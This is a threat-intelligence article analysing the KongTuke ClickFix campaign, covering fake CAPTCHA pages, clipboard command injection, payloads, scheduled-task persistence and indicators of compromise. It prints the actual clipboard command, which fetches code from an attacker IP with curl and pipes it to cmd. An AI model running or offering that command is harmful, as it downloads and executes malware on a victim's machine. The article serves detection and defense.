KongTuke ClickFix Activity Fuels New Wave of Social Engineering Malware Infections

By Azhar Khan
KongTuke ClickFix Activity Fuels New Wave of Social Engineering Malware Infections

Overview of the KongTuke ClickFix Campaign

In early January 2026, a sophisticated social engineering driven malware operation known as KongTuke ClickFix activity was observed abusing compromised websites to deliver malicious payloads. Rather than relying on software vulnerabilities, the attackers focused on manipulating user behavior, using fake CAPTCHA style verification pages to trigger execution.

The activity was documented in a controlled Windows lab environment involving a domain controller, but the infrastructure and techniques closely mirror real world infection chains. The campaign reflects a growing trend where attackers prioritize trust abuse over technical exploitation.

Compromised Websites and Script Injection

The infection chain begins when users visit a legitimate website that has been silently compromised. Malicious JavaScript is injected into the site, redirecting visitors to a ClickFix CAPTCHA page hosted on attacker controlled infrastructure.

These scripts dynamically collect contextual information including the victim’s IP address, browser, operating system, and referrer domain. Parameters are encoded and sent back to the attacker, allowing lightweight profiling before payload delivery.

KongTuke ClickFix CAPTCHA page

Clipboard-Based Command Execution

A defining element of this campaign is clipboard injection. When the victim interacts with the ClickFix page, a malicious command is copied directly into the system clipboard without visible indication.

The page then instructs the user to paste and execute the command, often framed as a final verification step. This method allows attackers to bypass many security controls by turning the user into the execution vector. 

cmd.exe /c start "" /min cmd /k "curl http://144.31.221.60/a | cmd && exit"
Clipboard injected command

Post-Infection Network Activity

Once executed, the malware initiates a multi-stage network communication sequence. Initial HTTP requests retrieve loader components, followed by POST requests that register the infected host with attacker infrastructure.

The malware then performs external IP discovery using public services and establishes repeated encrypted connections over legacy and non standard ports, suggesting command and control polling behavior.

KongTuke post infection traffic

Malware Payloads and Archive Analysis

The initial payload is a compressed archive approximately 25 MB in size containing a malicious Python package. It is extracted into a directory designed to resemble legitimate Windows system paths, reducing the likelihood of detection.

A second archive exceeding 200 MB is later downloaded. This payload masquerades as a Figma related updater and contains additional components used for persistence and extended functionality.

Extracted malware components

Persistence Mechanisms

Persistence is achieved through multiple scheduled tasks configured to execute every few minutes indefinitely. These tasks re-launch malicious Python scripts and PowerShell components, ensuring the malware remains active even if individual files are removed.

The use of misleading task names and Microsoft themed directory paths allows the malware to blend into normal system activity, significantly increasing dwell time.

Indicators of Compromise

The following indicators were observed during analysis of the KongTuke ClickFix activity and can be used for detection and threat hunting.

Malicious Domains and URLs

  • hxxps://frttsch[.]com/2w2w.js
  • hxxps://frttsch[.]com/js.php
  • hxxp://bz1d0zvfi03yhn1[.]top/getarchive
  • hxxp://checkifhuman[.]top
  • hxxp://ey267te[.]top/1.php
  • hxxp://fnjnbehjangelkd[.]top/txoidka8bfhtr.php

IP Addresses

  • 144.31.221[.]60
  • 144.31.221[.]71
  • 64.95.13[.]101
  • 103.27.157[.]146
  • 173.232.146[.]62
  • 45.61.136[.]222
  • 64.52.80[.]153
  • 64.190.113[.]206

File Hashes

  • d22b9d30b89d99ad80d1ee081fd20518985c1bc4e37b5e105bcc52231509fa25
  • 1dd91ba2f56ced5af731e67121619d6a9ef2cbb8f1524989fc542ef904605908

Persistence Artifacts

  • C:\Users\[username]\AppData\Local\Microsoft\Windows\SoftwareProtectionPlatform\
  • C:\Users\[username]\AppData\Roaming\figmaUpdater\
  • Scheduled Task: SoftwareProtection
  • Scheduled Task: Remove-NetNatStaticMapping

Why ClickFix Remains Effective

ClickFix campaigns succeed because they exploit familiarity and urgency. Users are conditioned to trust CAPTCHA challenges and command execution instructions in certain contexts, particularly technical or enterprise environments.

This campaign demonstrates how user driven execution chains can bypass traditional defenses that focus exclusively on exploit prevention.

Technical analysis and imagery referenced in this article are based on publicly documented research published by malware-traffic-analysis.net .

Azhar Khan
Azhar Khan
Azhar is a seasoned Cybersecurity Professional with over 8 years of experience in Cybersecurity Research.